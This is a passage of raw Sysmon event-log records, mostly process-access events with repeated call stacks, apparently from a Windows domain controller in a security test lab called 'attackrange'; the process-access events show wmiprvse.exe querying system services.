Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D16F59DD99427DF63DF9F16855D9D436,SHA256=239E935CCC66EE0C5390C6FFCDC82981328CF85142DE12A0712E86DE0D86D9A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6DD2-603E-CDAA-00000000AD01}128769232C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 